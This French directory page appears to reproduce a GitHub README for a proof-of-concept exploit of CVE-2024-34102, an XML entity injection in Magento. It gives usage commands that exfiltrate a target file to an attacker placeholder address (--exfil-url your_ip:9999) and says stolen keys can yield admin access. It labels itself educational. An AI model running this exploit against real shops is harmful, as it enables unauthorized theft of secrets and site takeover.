Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-34102 — Preuve de concept d'exploitation pour CVE-2024-34102, une injection d'entités XML critique dans Magento, permettant l'exfiltration de fichiers sensibles et un accès administrateur non autorisé. À usage éducatif. | Kitploit
Outils/GitHubGitHub/mksundaram69/cve-2024-34102
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesApprentissage et Éducation
GitHubmksundaram69/cve-2024-34102

CVE-2024-34102

Preuve de concept d'exploitation pour CVE-2024-34102, une injection d'entités XML critique dans Magento, permettant l'exfiltration de fichiers sensibles et un accès administrateur non autorisé. À usage éducatif.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

Nous exigeons le retour en toute sécurité de tous les citoyens pris en otage par le groupe terroriste Hamas. Nous ne nous reposerons pas tant que chaque otage ne sera pas libéré et ne rentrera pas chez lui sain et sauf. Vous pouvez aider à les ramener à la maison. https://stories.bringthemhomenow.net/

PoC CVE-2024-34102 🚀

Ce dépôt contient une preuve de concept (PoC) pour l'exploitation de la vulnérabilité critique d'injection d'entités XML (CVE-2024-34102) dans Magento. Cette vulnérabilité permet l'exfiltration de fichiers sensibles, qui peuvent ensuite être utilisés pour obtenir un accès non autorisé aux fonctionnalités administratives de Magento. Cet exploit est conçu à des fins éducatives et doit être utilisé de manière responsable.

Aperçu 📖

Magento est l'une des solutions de commerce électronique les plus populaires utilisées dans le monde. En juin 2024, un problème critique d'injection d'entités XML avant authentification a été découvert, identifié comme CVE-2024-34102. Cette vulnérabilité peut entraîner des conséquences graves, notamment l'exfiltration du fichier app/etc/env.php de Magento, qui contient les clés cryptographiques utilisées pour signer les JWT.

Fonctionnalités 🌟

  • Exfiltration de fichiers sensibles depuis une instance Magento vulnérable.
  • Utilisation simple et directe.
  • Démonstration éducative de l'injection d'entités XML.

Utilisation 🚀

Prérequis

  • Python 3.x
  • Bibliothèque requests (pip install requests)

Exécution de l'exploit

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. Exécutez le script avec les arguments nécessaires :

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

Arguments de la ligne de commande

  • --target-url : L'URL de l'instance Magento cible.
  • --target-file : Le chemin du fichier sur le serveur cible à exfiltrer.
  • --exfil-url : L'URL pour recevoir les données exfiltrées.

Exemple 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
Télécharger l’outil